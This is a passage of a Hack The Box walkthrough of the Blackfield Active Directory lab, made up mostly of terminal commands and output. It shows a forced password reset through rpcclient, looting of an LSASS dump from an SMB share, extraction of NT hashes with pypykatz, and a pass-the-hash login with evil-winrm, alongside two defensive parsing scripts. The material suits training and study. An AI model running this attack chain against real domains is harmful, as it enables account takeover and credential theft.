└─$ ~/.local/bin/aclpwn -f [email protected] -t blackfield.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.192 -sp '#00^BlackKnight'
[!] No path found!
┌──(kali㉿kali)-[~/HTB/blackfield]
Looking at the BloodHound graph manually, support has a ForceChangePassword edge to AUDIT2020, i.e. it can reset that user's password without knowing the current one.
![[Pasted image 20230910213306.png]]
We can change the password from rpcclient using this command I got from ChatGPT: rpcclient $> setuserinfo2 [username] 23 '[newpassword]' (info level 23 sets the password from cleartext). On a real engagement this is destructive, since the user's existing password stops working, so record the change and agree it with the client first.
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ rpcclient 10.10.10.192 -U support
Password for [WORKGROUP\support]:
rpcclient $> setuserinfo2 audit2020 23 'Password123!'
rpcclient $>
Check the new password with crackmapexec: SMB authentication works, but WinRM still fails for audit2020.
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb 10.10.10.192 -u audit2020 -p 'Password123!'
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Password123!
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec winrm 10.10.10.192 -u audit2020 -p 'Password123!'
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [-] BLACKFIELD.local\audit2020:Password123!
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
Checking the shares as this user: crackmapexec smb 10.10.10.192 -u audit2020 -p 'Password123!' --shares
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb 10.10.10.192 -u audit2020 -p 'Password123!' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Password123!
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
We can now read the forensic share.
We open it with smbclient (smbclient \\\\10.10.10.192\\forensic -U audit2020%'Password123!') and pull down the text files. Note that get takes a single file, which is why the wildcard below fails; mget is the command that expands wildcards.
└─$ smbclient \\\\10.10.10.192\\forensic -U audit2020%'Password123!'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 08:03:16 2020
.. D 0 Sun Feb 23 08:03:16 2020
commands_output D 0 Sun Feb 23 13:14:37 2020
memory_analysis D 0 Thu May 28 16:28:33 2020
tools D 0 Sun Feb 23 08:39:08 2020
5102079 blocks of size 4096. 1678453 blocks available
smb: \> cd commands_output
smb: \commands_output\> ls
. D 0 Sun Feb 23 13:14:37 2020
.. D 0 Sun Feb 23 13:14:37 2020
domain_admins.txt A 528 Sun Feb 23 08:00:19 2020
domain_groups.txt A 962 Sun Feb 23 07:51:52 2020
domain_users.txt A 16454 Fri Feb 28 17:32:17 2020
firewall_rules.txt A 518202 Sun Feb 23 07:53:58 2020
ipconfig.txt A 1782 Sun Feb 23 07:50:28 2020
netstat.txt A 3842 Sun Feb 23 07:51:01 2020
route.txt A 3976 Sun Feb 23 07:53:01 2020
systeminfo.txt A 4550 Sun Feb 23 07:56:59 2020
tasklist.txt A 9990 Sun Feb 23 07:54:29 2020
5102079 blocks of size 4096. 1678453 blocks available
smb: \commands_output\> cat domain_users.txt
cat: command not found
smb: \commands_output\> get domain_admins.txt
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \commands_output\> get *.txt
NT_STATUS_OBJECT_NAME_INVALID opening remote file \commands_output\*.txt
smb: \commands_output\> get domain_groups.txt
getting file \commands_output\domain_groups.txt of size 962 as domain_groups.txt (0.7 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \commands_output\> get domain_users.txt
getting file \commands_output\domain_users.txt of size 16454 as domain_users.txt (11.7 KiloBytes/sec) (average 4.3 KiloBytes/sec)
smb: \commands_output\>
When we cat domain_users.txt we see a user we had not come across before, Ipwn3dYouCompany:
BLACKFIELD969352 BLACKFIELD971417 BLACKFIELD978938
BLACKFIELD990638 BLACKFIELD991588 BLACKFIELD994577
BLACKFIELD995218 BLACKFIELD996878 BLACKFIELD997545
BLACKFIELD998321 Guest Ipwn3dYouCompany
krbtgt lydericlefebvre support
Ipwn3dYouCompany
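The new name above was spotted by eye in a three-column net user listing. As an added example (not from the original write-up), the bash helper below parses that column layout and the rpcclient enumdomusers layout into flat lists and diffs them case-insensitively, which surfaces accounts present in the forensic dump but missing from the live domain, and the other way round. Both inputs are constructed samples modelled on the outputs shown above, not what the real box returns; the function names are mine.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: compare the account list in
# the forensic dump (net user /domain output) with a live rpcclient enumeration.
set -eu

# Constructed sample in the layout of "net user /domain" (three name columns).
SAMPLE_NET_USER='The request will be processed at a domain controller for domain BLACKFIELD.local.


User accounts for \\DC01.BLACKFIELD.local

-------------------------------------------------------------------------------
Administrator            audit2020                BLACKFIELD163183
BLACKFIELD998321         Guest                    Ipwn3dYouCompany
krbtgt                   lydericlefebvre          support
The command completed successfully.'

# Constructed sample in the layout of rpcclient "enumdomusers".
SAMPLE_ENUMDOMUSERS='user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD163183] rid:[0x45b]
user:[BLACKFIELD998321] rid:[0x1234]
user:[lydericlefebvre] rid:[0x1235]
user:[svc_backup] rid:[0x1236]'

# net_user_names: stdin is net user output -> one name per line.
# Names start after the dashed rule and stop at "The command completed".
# CRLF line endings from a Windows capture are stripped first.
net_user_names() {
  awk '
                             { sub(/\r$/, "") }
    /^-+$/                   { body = 1; next }
    /^The command completed/ { body = 0 }
    body                     { for (i = 1; i <= NF; i++) print $i }
  '
}

# rpc_user_names: stdin is enumdomusers output -> one name per line.
rpc_user_names() {
  sed -n 's/^user:\[\(.*\)\] rid:\[.*\]$/\1/p'
}

# only_in_first <a> <b>: lines of <a> with no case-insensitive exact match in <b>.
# sAMAccountNames are case-insensitive, so -i avoids reporting false "new" accounts.
only_in_first() {
  grep -ivxFf "$2" "$1" || true
}

# Stand-alone demo on the constructed samples.
tmp=$(mktemp -d)
printf '%s\n' "$SAMPLE_NET_USER"     | net_user_names | sort -f > "$tmp/dump.txt"
printf '%s\n' "$SAMPLE_ENUMDOMUSERS" | rpc_user_names | sort -f > "$tmp/live.txt"
echo "in forensic dump, not in live domain:"; only_in_first "$tmp/dump.txt" "$tmp/live.txt"
echo "in live domain, not in forensic dump:"; only_in_first "$tmp/live.txt" "$tmp/dump.txt"
```

The same diff is worth running against the bloodhound-python users.json or an ldapsearch dump: an account that appears in an old forensic snapshot but not in the live directory (or the reverse) is exactly the kind of thing an attacker-created user like Ipwn3dYouCompany would show up as.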
I'll try to see if we can get an AS-REP hash for it. Note that without -no-pass and with an empty password, GetNPUsers.py attempts an LDAP bind first, which fails anonymously, so this run tells us nothing about the account itself:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py blackfield.LOCAL/Ipwn3dYouCompany
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
Check the other folder:
└─$ smbclient \\\\10.10.10.192\\forensic -U audit2020%'Password123!'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 08:03:16 2020
.. D 0 Sun Feb 23 08:03:16 2020
commands_output D 0 Sun Feb 23 13:14:37 2020
memory_analysis D 0 Thu May 28 16:28:33 2020
tools D 0 Sun Feb 23 08:39:08 2020
5102079 blocks of size 4096. 1678438 blocks available
smb: \> cd memory_analysis
smb: \memory_analysis\> ls
. D 0 Thu May 28 16:28:33 2020
.. D 0 Thu May 28 16:28:33 2020
conhost.zip A 37876530 Thu May 28 16:25:36 2020
ctfmon.zip A 24962333 Thu May 28 16:25:45 2020
dfsrs.zip A 23993305 Thu May 28 16:25:54 2020
dllhost.zip A 18366396 Thu May 28 16:26:04 2020
ismserv.zip A 8810157 Thu May 28 16:26:13 2020
lsass.zip A 41936098 Thu May 28 16:25:08 2020
mmc.zip A 64288607 Thu May 28 16:25:25 2020
RuntimeBroker.zip A 13332174 Thu May 28 16:26:24 2020
ServerManager.zip A 131983313 Thu May 28 16:26:49 2020
sihost.zip A 33141744 Thu May 28 16:27:00 2020
smartscreen.zip A 33756344 Thu May 28 16:27:11 2020
svchost.zip A 14408833 Thu May 28 16:27:19 2020
taskhostw.zip A 34631412 Thu May 28 16:27:30 2020
winlogon.zip A 14255089 Thu May 28 16:27:38 2020
wlms.zip A 4067425 Thu May 28 16:27:44 2020
WmiPrvSE.zip A 18303252 Thu May 28 16:27:53 2020
5102079 blocks of size 4096. 1678438 blocks available
smb: \memory_analysis\>
I pasted this listing into ChatGPT and asked "anything interesting you see here:", and it told me:
lsass.zip: This stands out immediately. LSASS (Local Security Authority Subsystem Service) manages the system’s authentication policy and might contain authentication credentials in memory. Attackers frequently target this process to extract clear-text passwords, hashes, Kerberos tickets, etc. Tools like Mimikatz can parse LSASS memory dumps for credentials.
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ cd lsass
cd: no such file or directory: lsass
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls
20230910090640_computers.json blackfield cleaned_users.txt domain_users.txt users2.txt
20230910090640_domains.json blackfield.gnmap cleanusers2.txt kerbrute users.txt
20230910090640_groups.json blackfield.nmap domain_admins.txt lsass.DMP
20230910090640_users.json blackfield.xml domain_groups.txt lsass.zip
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ cd lsass.DMP
cd: not a directory: lsass.DMP
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
Googled how to work with this lsass.dmp. Following an article, I fetched mimikatz.py and copied it to the blackfield folder:
nt.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23657 (23K) [text/plain]
Saving to: ‘mimikatz.py’
mimikatz.py 100%[==============================================>] 23.10K --.-KB/s in 0.002s
2023-09-10 10:10:12 (10.7 MB/s) - ‘mimikatz.py’ saved [23657/23657]
┌──(kali㉿kali)-[~/Downloads]
└─$ ls
10.10.10.175:80 BloodHound-linux-x64.zip 'mimikatz(1).exe' System.ValueTuple.dll
10.10.10_files code_1.81.1-1691620686_amd64.deb mimikatz.exe Win32
aclpwn.py Invoke-Mimikatz.ps1 mimikatz.py winPEASx64.exe
Bloodhound_3 kerbrute_linux_amd64 mimikatz_trunk winPEASx86.exe
BloodHound-3.0.5.zip kiwi_passwords.yar mimikatz_trunk.zip x64
'BloodHound-linux-x64(1).zip' mimicom.idl README.md
┌──(kali㉿kali)-[~/Downloads]
└─$ cp mimikatz.py ~/HTB/blackfield
┌──(kali㉿kali)-[~/Downloads]
└─$
Modified mimikatz.py so it runs under Python 3, a recommendation from ChatGPT after I got the error:
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 2to3 -w mimikatz.py
/usr/bin/2to3:3: DeprecationWarning: lib2to3 package is deprecated and may not be able to parse Python 3.10+
from lib2to3.main import main
RefactoringTool: Skipping optional fixer: buffer
RefactoringTool: Skipping optional fixer: idioms
RefactoringTool: Skipping optional fixer: set_literal
RefactoringTool: Skipping optional fixer: ws_comma
RefactoringTool: Refactored mimikatz.py
--- mimikatz.py (original)
+++ mimikatz.py (refactored)
@@ -296,12 +296,12 @@
return cleartext
def dump(self):
- print 'Dumping LSA Decryptor'
- print ' IV ({}): {}'.format(len(self.iv), self.iv.encode('hex'))
- print 'DES_KEY ({}): {}'.format(
- len(self.des_key), self.des_key.encode('hex'))
- print 'AES_KEY ({}): {}'.format(
- len(self.aes_key), self.aes_key.encode('hex'))
+ print('Dumping LSA Decryptor')
+ print(' IV ({}): {}'.format(len(self.iv), self.iv.encode('hex')))
+ print('DES_KEY ({}): {}'.format(
+ len(self.des_key), self.des_key.encode('hex')))
+ print('AES_KEY ({}): {}'.format(
+ len(self.aes_key), self.aes_key.encode('hex')))
class LsaDecryptor_x86(LsaDecryptor, Mimikatz_x86):
RefactoringTool: Files that were modified:
RefactoringTool: mimikatz.py
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
Had to install the missing dependency "construct":
└─$ python3 mimikatz.py
Traceback (most recent call last):
File "/home/kali/HTB/blackfield/mimikatz.py", line 31, in <module>
import construct
ModuleNotFoundError: No module named 'construct'
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ pip3 install construct
Defaulting to user installation because normal site-packages is not writeable
Collecting construct
Downloading construct-2.10.68.tar.gz (57 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 57.9/57.9 kB 743.5 kB/s eta 0:00:00
Preparing metadata (setup.py) ... done
Building wheels for collected packages: construct
Building wheel for construct (setup.py) ... done
Created wheel for construct: filename=construct-2.10.68-py3-none-any.whl size=59223 sha256=179a525c80f0ba0da8cea12f3129cb9dd0057e596e5043292f28804f35adecbc
Stored in directory: /home/kali/.cache/pip/wheels/6a/5b/a1/35e70b419451f0f619898c0f9ec10f3d920721daed7bc24eab
Successfully built construct
Installing collected packages: construct
Successfully installed construct-2.10.68
Had to install volatility, again a missing dependency.
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ python3 mimikatz.py
Traceback (most recent call last):
File "/home/kali/HTB/blackfield/mimikatz.py", line 35, in <module>
import volatility.obj as obj
ModuleNotFoundError: No module named 'volatility'
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ pip3 install volatility3
Defaulting to user installation because normal site-packages is not writeable
Collecting volatility3
Downloading volatility3-2.4.1-py3-none-any.whl (687 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 687.5/687.5 kB 3.0 MB/s eta 0:00:00
Requirement already satisfied: pefile>=2017.8.1 in /usr/lib/python3/dist-packages (from volatility3) (2023.2.7)
Installing collected packages: volatility3
WARNING: The scripts vol and volshell are installed in '/home/kali/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
Successfully installed volatility3-2.4.1
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
Many issues, only to realise we have mimikatz.py under impacket.
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ locate mimikatz.py
/usr/share/doc/python3-impacket/examples/mimikatz.py
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
I try to run mimikatz.py.
└─$ python3 /usr/share/doc/python3-impacket/examples/mimikatz.py
Impacket v0.11.0 - Copyright 2023 Fortra
usage: mimikatz.py [-h] [-file FILE] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
[-dc-ip ip address] [-target-ip ip address]
target
SMB client implementation.
positional arguments:
target [[domain/]username[:password]@]<targetName or address>
options:
-h, --help show this help message and exit
-file FILE input file with commands to execute in the mini shell
-debug Turn DEBUG output ON
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on
target parameters. If valid credentials cannot be found, it will use the ones specified in
the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN)
specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target.
This is useful when target is the NetBIOS name and you cannot resolve it
I am going to run the mimikatz exe with wine instead.
Have to install wine on my Kali.
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ sudo dpkg --add-architecture i386
sudo apt update
Get:1 http://packages.microsoft.com/repos/code stable InRelease [3,569 B]
Get:2 http://packages.microsoft.com/repos/code stable/main armhf Packages [79.5 kB]
Hit:4 http://deb.debian.org/debian oldstable InRelease
Get:5 http://packages.microsoft.com/repos/code stable/main arm64 Packages [79.2 kB]
Get:6 http://packages.microsoft.com/repos/code stable/main amd64 Packages [78.6 kB]
Hit:3 http://kali.download/kali kali-rolling InRelease
Hit:7 https://debian.neo4j.com stable InRelease
Get:8 http://deb.debian.org/debian oldstable/main i386 Packages [8,122 kB]
Get:9 http://kali.download/kali kali-rolling/main i386 Packages [19.1 MB]
Get:10 https://debian.neo4j.com stable/3.5 i386 Packages [10.2 kB]
Get:11 http://deb.debian.org/debian oldstable/main i386 Contents (deb) [10.2 MB]
Get:12 http://kali.download/kali kali-rolling/main i386 Contents (deb) [43.8 MB]
Get:13 http://deb.debian.org/debian oldstable/contrib i386 Packages [45.4 kB]
Get:14 http://deb.debian.org/debian oldstable/contrib i386 Contents (deb) [33.6 kB]
Get:15 http://deb.debian.org/debian oldstable/non-free i386 Packages [79.3 kB]
Get:16 http://deb.debian.org/debian oldstable/non-free i386 Contents (deb) [29.2 kB]
Get:17 http://kali.download/kali kali-rolling/non-free i386 Packages [176 kB]
Get:18 http://kali.download/kali kali-rolling/non-free i386 Contents (deb) [862 kB]
Get:19 http://kali.download/kali kali-rolling/contrib i386 Packages [99.9 kB]
Get:20 http://kali.download/kali kali-rolling/contrib i386 Contents (deb) [138 kB]
Fetched 83.0 MB in 23s (3,545 kB/s)
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
13 packages can be upgraded. Run 'apt list --upgradable' to see them.
W: http://packages.microsoft.com/repos/code/dists/stable/InRelease: The key(s) in the keyring /etc/apt/trusted.gpg.d/neo4j-archive-keyring.gpg are ignored as the file has an unsupported filetype.
W: http://deb.debian.org/debian/dists/oldstable/InRelease: The key(s) in the keyring /etc/apt/trusted.gpg.d/neo4j-archive-keyring.gpg are ignored as the file has an unsupported filetype.
W: http://http.kali.org/kali/dists/kali-rolling/InRelease: The key(s) in the keyring /etc/apt/trusted.gpg.d/neo4j-archive-keyring.gpg are ignored as the file has an unsupported filetype.
W: https://debian.neo4j.com/dists/stable/InRelease: The key(s) in the keyring /etc/apt/trusted.gpg.d/neo4j-archive-keyring.gpg are ignored as the file has an unsupported filetype.
W: https://debian.neo4j.com/dists/stable/InRelease: Key is stored in legacy trusted.gpg keyring (/etc/apt/trusted.gpg), see the DEPRECATION section in apt-key(8) for details.
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ sudo apt install wine64
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
mimikatz fails me 🙁
mimikatz # sekurlsa::minidump lsass.DMP
Switch to MINIDUMP : 'lsass.DMP'
mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.DMP' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
mimikatz #
There is an implementation of mimikatz in Python called pypykatz.
Installing it via pip.
└─$ pip3 install pypykatz
Defaulting to user installation because normal site-packages is not writeable
DEPRECATION: Loading egg at /usr/local/lib/python3.11/dist-packages/volatility-2.6.1-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
Requirement already satisfied: pypykatz in /usr/lib/python3/dist-packages (0.6.6)
Requirement already satisfied: aesedb>=0.1.3 in /usr/lib/python3/dist-packages (from pypykatz) (0.1.3)
Requirement already satisfied: aiosmb>=0.4.4 in /usr/lib/python3/dist-packages (from pypykatz) (0.4.4)
Requirement already satisfied: aiowinreg>=0.0.7 in /usr/lib/python3/dist-packages (from pypykatz) (0.0.7)
Requirement already satisfied: minidump>=0.0.21 in /usr/lib/python3/dist-packages (from pypykatz) (0.0.21)
Requirement already satisfied: minikerberos>=0.4.0 in /usr/lib/python3/dist-packages (from pypykatz) (0.4.0)
Requirement already satisfied: msldap>=0.4.7 in /usr/lib/python3/dist-packages (from pypykatz) (0.4.7)
Requirement already satisfied: tqdm in /usr/lib/python3/dist-packages (from pypykatz) (4.64.1)
Requirement already satisfied: unicrypto>=0.0.10 in /usr/lib/python3/dist-packages (from pypykatz) (0.0.10)
Requirement already satisfied: winacl>=0.1.6 in /usr/lib/python3/dist-packages (from pypykatz) (0.1.7)
Requirement already satisfied: colorama in /usr/lib/python3/dist-packages (from aesedb>=0.1.3->pypykatz) (0.4.6)
Requirement already satisfied: asyauth>=0.0.8 in /usr/lib/python3/dist-packages (from aiosmb>=0.4.4->pypykatz) (0.0.9)
Requirement already satisfied: asysocks>=0.2.2 in /usr/lib/python3/dist-packages (from aiosmb>=0.4.4->pypykatz) (0.2.2)
Requirement already satisfied: asn1crypto>=1.3.0 in /usr/lib/python3/dist-packages (from minikerberos>=0.4.0->pypykatz) (1.5.1)
Requirement already satisfied: oscrypto>=1.2.1 in /usr/lib/python3/dist-packages (from minikerberos>=0.4.0->pypykatz) (1.3.0)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from minikerberos>=0.4.0->pypykatz) (1.16.0)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from unicrypto>=0.0.10->pypykatz) (3.11.0)
Requirement already satisfied: cryptography>=38.0.1 in /usr/lib/python3/dist-packages (from winacl>=0.1.6->pypykatz) (38.0.4)
I asked ChatGPT for the command and it gave me: pypykatz lsa minidump lsass.DMP -o output.txt
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ pypykatz lsa minidump lsass.DMP -o output.txt
INFO:pypykatz:Parsing file lsass.DMP
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls
20230910090640_computers.json blackfield cleaned_users.txt domain_users.txt mimikatz.exe users2.txt
20230910090640_domains.json blackfield.gnmap cleanusers2.txt kerbrute mimikatz.py users.txt
20230910090640_groups.json blackfield.nmap domain_admins.txt lsass.DMP mimikatz.py.bak volatility
20230910090640_users.json blackfield.xml domain_groups.txt lsass.zip output.txt
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
We get hashes for Administrator and for svc_backup.
administrator
== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
== MSV ==
Username: Administrator
Domain: BLACKFIELD
LM: NA
NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
DPAPI: 240339f898b6ac4ce3f34702e4a89550
== WDIGEST [25869]==
username Administrator
domainname BLACKFIELD
password None
password (hex)
== Kerberos ==
Username: Administrator
Domain: BLACKFIELD.LOCAL
== WDIGEST [25869]==
username Administrator
domainname BLACKFIELD
password None
password (hex)
== DPAPI [25869]==
luid 153705
key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9
svc_backup
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
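As an added defender-side example (not code from this post or from pypykatz), here is a small Python parser for the text layout shown above. It groups the flat key/value lines into one record per LSASS logon session and then summarises what a responder would want to know from such a dump: which sessions still hold an NT hash, which sessions had a cleartext password cached by WDigest (the `password None` lines above mean that did not happen here), and whether the built-in RID 500 account was among them. The sample dump, every SID and hash value, and the third `legacyuser` session are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample in the layout `pypykatz lsa minidump` prints. Account names
# mirror the dump above; every SID, hash and password value is made up, and the
# third session is invented to show a host with WDigest caching still enabled.
SAMPLE = """\
== LogonSession ==
username Administrator
domainname BLACKFIELD
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-1111111111-2222222222-3333333333-500
== MSV ==
Username: Administrator
LM: NA
NT: 11111111111111111111111111111111
== WDIGEST [25869]==
password None
password (hex)
== LogonSession ==
username svc_backup
domainname BLACKFIELD
sid S-1-5-21-1111111111-2222222222-3333333333-1413
== MSV ==
NT: 22222222222222222222222222222222
== WDIGEST [633ba]==
password None
password (hex)
== LogonSession ==
username legacyuser
domainname BLACKFIELD
sid S-1-5-21-1111111111-2222222222-3333333333-1500
== MSV ==
NT: 33333333333333333333333333333333
== WDIGEST [7a120]==
password ExamplePass1
password (hex) 4500780061006d0070006c00650050006100730073003100
"""

@dataclass
class LogonSession:
    username: str = ""
    domain: str = ""
    sid: str = ""
    nt_hash: Optional[str] = None           # MSV NT hash; None when pypykatz prints NA
    wdigest_password: Optional[str] = None  # set only if WDigest kept a cleartext copy

    @property
    def rid(self) -> Optional[int]:
        """Relative ID, the last SID component (500 is the built-in Administrator)."""
        return int(self.sid.rsplit("-", 1)[1]) if self.sid else None

HEADER = re.compile(r"^==\s*(\w+)\b.*==\s*$")   # "== MSV ==", "== WDIGEST [25869]=="
KV = re.compile(r"^([A-Za-z_]+)\s*:?\s*(.*)$")  # "sid S-1-5-..." or "NT: 7f1e..."

def parse_pypykatz(text: str) -> List[LogonSession]:
    """Group the flat key/value output into one record per LSASS logon session."""
    sessions: List[LogonSession] = []
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HEADER.match(line)
        if m:
            section = m.group(1)
            if section == "LogonSession":
                sessions.append(LogonSession())
            continue
        kv = KV.match(line)
        if not kv or not sessions:
            continue
        key, value, cur = kv.group(1).lower(), kv.group(2).strip(), sessions[-1]
        if section == "LogonSession":
            if key == "username":
                cur.username = value
            elif key == "domainname":
                cur.domain = value
            elif key == "sid":
                cur.sid = value
        elif section == "MSV" and key == "nt" and value.upper() != "NA":
            cur.nt_hash = value.lower()
        elif section == "WDIGEST" and key == "password":
            # "password (hex) ..." is the UTF-16 echo of the same value; skip it
            if value and value != "None" and not value.startswith("(hex)"):
                cur.wdigest_password = value
    return sessions

def triage(sessions: List[LogonSession]) -> Dict[str, List[str]]:
    """Defender's summary: which accounts left reusable secrets in this LSASS image."""
    findings: Dict[str, List[str]] = {"nt_hash": [], "wdigest_cleartext": [], "builtin_admin": []}
    for s in sessions:
        label = f"{s.domain}\\{s.username}"
        if s.nt_hash:
            findings["nt_hash"].append(label)
        if s.wdigest_password:
            findings["wdigest_cleartext"].append(label)
        if s.rid == 500:
            findings["builtin_admin"].append(label)
    return findings
```

The `password None` lines in the real dump are the good outcome: with `UseLogonCredential` set to 0 under `HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest`, the WDigest provider no longer caches cleartext, so an LSASS image yields NT hashes but not passwords. A RID 500 session in a dump is worth noting on its own, since it means the built-in Administrator logged on to that host interactively.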
Using evil-winrm on both.
Administrator – no luck
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ crackmapexec winrm 10.10.10.161 -u Administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
[*] completed: 100.00% (1/1)
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ evil-winrm -i 10.10.10.192 -u Administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
svc_backup – Phew, we are in and get a flag
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> ls
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ../
*Evil-WinRM* PS C:\Users\svc_backup> cd dektop
